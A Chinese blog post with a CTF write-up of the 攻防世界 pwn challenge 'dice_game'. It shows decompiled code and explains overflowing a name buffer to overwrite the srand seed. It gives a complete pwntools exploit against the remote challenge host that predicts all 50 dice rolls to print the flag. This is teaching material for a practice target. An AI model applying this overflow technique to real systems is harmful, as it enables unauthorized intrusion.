攻防世界pwn——dice_game

最新推荐文章于 2024-07-23 13:03:02 发布
最新推荐文章于 2024-07-23 13:03:02 发布
阅读量436 收藏 1
点赞数
分类专栏: PWN 文章标签: linux ubuntu 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62076255/article/details/128377300
版权

题目链接:攻防世界 (xctf.org.cn)

文件分析

checksec检查看到没有开启canary保护

 然后放到IDA里去看

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char buf[55]; // [rsp+0h] [rbp-50h] BYREF
  char v5; // [rsp+37h] [rbp-19h]
  ssize_t v6; // [rsp+38h] [rbp-18h]
  unsigned int seed[2]; // [rsp+40h] [rbp-10h]
  unsigned int v8; // [rsp+4Ch] [rbp-4h]

  memset(buf, 0, 0x30uLL);
  *(_QWORD *)seed = time(0LL);
  printf("Welcome, let me know your name: ");
  fflush(stdout);
  v6 = read(0, buf, 0x50uLL);
  if ( v6 <= 49 )
    buf[v6 - 1] = 0;
  printf("Hi, %s. Let's play a game.\n", buf);
  fflush(stdout);
  srand(seed[0]);
  v8 = 1;
  v5 = 0;
  while ( 1 )
  {
    printf("Game %d/50\n", v8);
    v5 = sub_A20();
    fflush(stdout);
    if ( v5 != 1 )
      break;
    if ( v5 )
    {
      if ( v8 == 50 )
      {
        sub_B28(buf);
        break;
      }
      ++v8;
    }
  }
  puts("Bye bye!");
  return 0LL;
}

if(v8==50)会执行sub_B28(buf),这个函数里看到了flag文件,最终目标是它

int __fastcall sub_B28(const char *a1)
{
  char s[104]; // [rsp+10h] [rbp-70h] BYREF
  FILE *stream; // [rsp+78h] [rbp-8h]

  printf("Congrats %s\n", a1);
  stream = fopen("flag", "r");
  fgets(s, 100, stream);
  puts(s);
  return fflush(stdout);
}

执行该函数需要v5为真50次

__int64 sub_A20()
{
  __int64 result; // rax
  __int16 v1; // [rsp+Ch] [rbp-4h] BYREF
  __int16 v2; // [rsp+Eh] [rbp-2h]

  printf("Give me the point(1~6): ");
  fflush(stdout);
  _isoc99_scanf("%hd", &v1);
  if ( v1 > 0 && v1 <= 6 )
  {
    v2 = rand() % 6 + 1;
    if ( v1 <= 0 || v1 > 6 || v2 <= 0 || v2 > 6 )
      _assert_fail("(point>=1 && point<=6) && (sPoint>=1 && sPoint<=6)", "dice_game.c", 0x18u, "dice_game");
    if ( v1 == v2 )
    {
      puts("You win.");
      result = 1LL;
    }
    else
    {
      puts("You lost.");
      result = 0LL;
    }
  }
  else
  {
    puts("Invalid value!");
    result = 0LL;
  }
  return result;
}

查看v5的值来源,给v5赋值的函数是一个猜数过程,猜对即可。也就是说需要连续猜对50次才行,所以需要利用栈内的偏移将随机数覆盖掉,这样的随机数就是“已知”的了

观察存放伪随机数的seed与buf之间偏移为0x40,而buf是可以在输入name的时候控制内容,而输入限制了0x50个,可以利用buf溢出来偏移到seed上,覆盖掉seed后就可以自己生成一样的伪随机数了

exp

from pwn import *
from ctypes import *

p=remote('61.147.171.105' ,61562)
libc=cdll.LoadLibrary("libc.so.6")

payload = 'a'*0x40+p64(1)
p.sendlineafter("name: ", payload)

res=[]
for i in range(50):
    res.append(libc.rand()%6+1)
print res
for a in res:
    p.sendlineafter("point(1~6): ", str(a))
p.interactive()

留个点,随机数的生成这里没搞太懂

Lyrisฅ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dice_game [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列12
重新启程
12-23 1712
题目地址:dice_game 从这篇开始就正式进入高手进阶区,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
攻防世界高手进阶区——dice_game
weixin_62675330的博客
02-19 1933
攻防世界高手进阶区——dice_game 题目里面啥都没有。 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的。 运行 可以看出是要猜数字,猜对50次。 ida逆向 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[55]; // [rsp+0h] [rbp-50h] BYREF char v5; // [rsp+37h] [rbp-19h] ssize_t v6; // [
攻防世界 Pwn dice_game
MrTreebook的博客
12-18 290
攻防世界 Pwn dice_game1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary,可能是简单的栈溢出 3.IDA分析 在sub_A20()中可以看出v2是一个通过种子生成的 1~6 的 随机数 之前有做过类似的题,只要控制种子即可预测随机数 在read函数处有栈溢出的漏洞 在下面看到需要连续答对50次才可以获取flag 那么我们构造的思路就是利用这个溢出点覆盖seed从而预测随机数 4.exp from pwn im
CTF中的PWN——srand()/rand()漏洞(栈溢出)
壊壊的诱惑你的博客
11-16 4537
摘要: 本以为自己栈溢出学的不错了,挑战了一下攻防世界PWN高手进阶,发现栈溢出还是有很多相关的漏洞,今天总结一下srand()函数的漏洞。 srand()/rand(): 简单介绍一下这两个函数: rand()函数是使用线性同余法做的,它并不是真的随机数,因为其周期特别长,所以在一定范围内可以看成随机的。 srand()为初始化随机数发生器,用于设置rand...
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1116
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
三个pwn
weixin_52640415的博客
06-28 1669
shortcut :格式化字符串漏洞写溢出 lucky_guy:alloca负值覆盖ret babynote:libc-2.31禁用exec写 ORW free_hook->sigreturnframe-> setcontex+61->orw
ISCC2021-[pwn]game
半岛铁盒的博客
05-26 656
from pwn import * from ctypes import * p = remote('39.96.88.40','7040') context.log_level="debug" payload = b'a' * (0x30-0x8) + p32(0) p.sendlineafter("Your name is :",payload) rand = ['55 ','15 ','82 ','1 ','98 ','68 ','67 ','15 ','86 ','3 '] fo...
awd攻防比赛总结——3s_NwGeek.docx
09-30
首先,作者介绍了比赛的规则和环境,包括多个环境、Web 和 Pwn 等。然后,作者分享了自己的战略和技巧,其中包括挖洞、补洞、溯源分析和可持续访问等。 在比赛中,作者遇到了很多的问题,例如服务器Environment会...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
Sokoban_Game:推箱子游戏
06-27
推箱子_游戏 推箱子游戏 用Java语言开发来模拟推箱子游戏。 该项目包括在每个控制台用 Java 语言模拟推箱子游戏(仓库管理器),其中包括在平面上的特定点放置盒子,为此需要实现各种数据结构和分辨率算法,以提供...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn_dice_game
weixin_44464829的博客
10-31 268
常规操作:checksec dice_game 发现文件是64位 放入ida中看c的伪代码: 这是一个猜数字的题,之前有做过类似的题,目的是覆盖seed,使随机数不再随机产生 点开sub_A20()看看随机数怎么构造的: 可以看到rand()%6+1线性同余的方式生成随机数,下一步就是想要覆盖掉种子位置上的值 看一下种子的位置: buf是我们可以写 入数据的缓冲区,通过read函数写入,这又是经典的栈溢出漏洞 0x50-0x10=0x40 因为附件解压后有两个文件,其中一个是l
攻防世界-dice_game-Writeup
SkYe's Blog
05-13 802
dice_game 题目来源: XCTF 4th-QCTF-2018 考点:栈溢出、混合编程 基本情况 程序实现的是一个具有用户姓名输入的菜随机数程序。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 栈溢出 一开始我在纠结是输入数字时使用的是短整型,可不可能是整型溢出,这样既能保持低位数字符合要求,又能控制
功防世界dice_game
weixin_34190136的博客
05-03 255
buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。 Exploit 由于担心 python 的 randint 实现跟 libc 的不太一样,所以我写了个小程序 在vim编译运行.c文件步骤:...
dice_game XCTF 4th-QCTF-2018
qq_41071646的博客
04-27 1077
其实感觉这个题 不算是pwn题。。。 这 pwn 里面就是 读取flag 文件 然后我们看一下 sub_a20 这个函数 随机数啊 本来我没有想用 把种子给 覆盖掉 但是 time(0) 感觉不稳 时间一万一不对劲 那么随机数 也会出错 所以干脆 把种子固定下来 下面是 exp #coding:utf-8 from pwn import* list...
攻防世界 dice_game栈溢出+随机数
fanghuapyk的博客
03-19 201
攻防世界 dice_game栈溢出+随机数 检查保护 发现是64位程序,并且开启了NX保护和地址随机化 上ida 发现flag敏感字符,追踪发现sub_B28函数里面可以直接得到flag 这里解释一下 Fopen函数: FILE *fopen(char *filename, char *mode); filename为文件名(包括文件路径),mode为打开方式,它们都是字符串。 Fget函数: 函数原型 char *fgets(char *str, int n, FILE *stream); 参数:
攻防世界 PWN 高手进阶 dice_game (write up)
qq_44768749的博客
08-18 377
攻防世界 PWN 高手进阶 dice_gamedice_game0x01 查看保护机制0x02 反汇编main:sub_A20():sub_B28():0x03利用过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 dice_ga
Linux小程序——进度条
最新发布
m0_66182473的博客
07-23 512
进度条
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值